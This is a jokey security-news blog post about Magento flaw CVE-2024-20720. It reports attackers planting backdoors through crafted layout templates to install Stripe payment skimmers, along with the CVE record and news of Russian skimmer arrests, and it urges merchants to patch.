Magento Mayhem: Hackers Exploit Flaw to Plant Stealthy Backdoors in E-Commerce Sites

Magento merchants, beware! A critical flaw, dubbed CVE-2024-20720, has hackers sliding backdoors into e-commerce sites faster than a greased credit card through a skimmer. Patch up or risk joining the digital shoplifters’ checkout party! #MagentoBackdoorBonanza

Hot Take:

Who knew that shopping carts could carry more than just your impulse buys? In the world of Magento, they’re apparently also toting around malicious code like it’s the latest fashion accessory. Adobe patches a hole, and the cyber bandits find a new window to shimmy through. It’s like a never-ending game of digital whack-a-mole, but instead of moles, it’s your credit card details at stake!

Key Points:

  • Critical flaw in Magento (CVE-2024-20720) allows for arbitrary code execution.
  • Adobe patched the issue, but attackers are still exploiting it with a sneaky backdoor.
  • The backdoor is executed when customers hit the checkout cart, leading to a Stripe payment skimmer being planted.
  • Financial info is skimmed and sent off to another compromised Magento store.
  • The Russian government has charged six individuals for similar skimmer malware activities dating back to 2017.
Title: Command injection in data collector backup due to insufficient patching of CVE-2023-38208
Cve id: CVE-2024-20720
Cve state: PUBLISHED
Cve assigner short name: adobe
Cve date updated: 02/15/2024
Cve description: Adobe Commerce versions 2.4.6-p3, 2.4.5-p5, 2.4.4-p6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. Exploitation of this issue does not require user interaction.

Need to know more?

The Checkout Checkout

Imagine stepping into the checkout line and instead of a friendly cashier, you're greeted by a digital pickpocket, sneakily slipping a backdoor into your shopping cart. That's essentially what's happening to e-commerce sites running Magento. Thanks to a critical flaw, CVE-2024-20720, the checkout process now comes with an unwanted side of arbitrary code execution. It's like finding a worm in your apple—except the worm is out to steal your wallet.

Adobe's Game of Patch-Catch

Adobe did its due diligence and released a patch faster than you can say "update now," but the cybercriminals are playing at a grandmaster level. Sansec discovered that these digital miscreants have concocted a "cleverly crafted layout template," which is basically a Trojan horse in database form. Every time a customer innocently clicks to view their cart, they're pulling the strings of a hidden puppet master that's busy setting up a Stripe payment skimmer. It's the online equivalent of finding out your shopping cart has been doubling as a getaway car.

Skimming the Cream of the Crop

So, what's the big prize for these attackers? Financial information, of course! The Stripe skimmer is like a high-tech pickpocket, deftly lifting credit card details and whisking them away to another compromised Magento storefront. It's a heist that's not just clever, but also alarmingly persistent, sticking around like that one relative who won't leave after the holidays.

Russian Roulette with Skimmers

Meanwhile, over in Russia, the government seems to be dealing with its own cybercriminal all-stars. Six individuals, with names that sound like they could belong to a hacker boy band, have been charged with using skimmer malware since at least the late '10s. These digital bandits allegedly made off with info from almost 160 thousand payment cards. It's like Ocean's Eleven, but instead of robbing casinos, they're after your digital dough.

The Moral of the Story?

Keep your shopping carts locked and your patches up to date, folks. The digital aisles are rife with more than just tempting sales; they're also crawling with cyber thieves looking to score a jackpot at your expense. It's a wild web out there, and it seems every checkout could potentially add a little more excitement to your shopping spree than you bargained for.

Tags: arbitrary code execution, Credit card theft, CVE-2024-20720, e-commerce security, Magento exploitation, Payment skimmer, Russian hacker arrests